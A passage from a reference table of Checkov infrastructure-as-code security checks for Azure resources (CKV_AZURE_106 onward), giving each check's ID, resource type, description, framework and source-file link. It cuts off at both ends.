Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | -| 1817 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | -| 1818 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 1819 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 1820 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | -| 1821 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | -| 1822 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 1823 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 1824 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | -| 1825 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | -| 1826 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 1827 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 1828 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | -| 1829 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 1830 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 1831 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | -| 1832 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 1833 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 1834 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | -| 1835 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 1836 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 1837 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | -| 1838 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | -| 1839 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | -| 1840 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | -| 1841 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | -| 1842 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | -| 1843 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1844 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | -| 1845 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 1846 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 1847 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | -| 1848 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | -| 1849 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 1850 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 1851 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | -| 1852 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | -| 1853 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | -| 1854 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | -| 1855 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | -| 1856 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | -| 1857 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | -| 1858 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 1859 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 1860 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | -| 1861 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | -| 1862 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | -| 1863 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) | -| 1864 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 1865 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 1866 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | -| 1867 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | -| 1868 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 1869 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 1870 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | -| 1871 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | -| 1872 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | -| 1873 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | -| 1874 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | -| 1875 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | -| 1876 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | -| 1877 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | -| 1878 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | -| 1879 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | -| 1880 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | -| 1881 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1882 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1883 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1884 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1885 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1886 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | -| 1887 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | -| 1888 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | -| 1889 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | -| 1890 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1891 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1892 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1893 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | Bicep | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 1894 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1895 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | -| 1896 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | -| 1897 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 1898 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | Bicep | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 1899 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | -| 1900 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | -| 1901 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1902 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1903 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | -| 1904 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | -| 1905 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | -| 1906 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | -| 1907 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | -| 1908 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure that databricks workspace is not public | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | -| 1909 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1910 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | -| 1911 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 1912 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 1913 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 1914 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | Bicep | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 1915 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1916 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | -| 1917 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | -| 1918 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | -| 1919 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | -| 1920 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | -| 1921 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | -| 1922 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | -| 1923 | CKV_AZURE_167 | 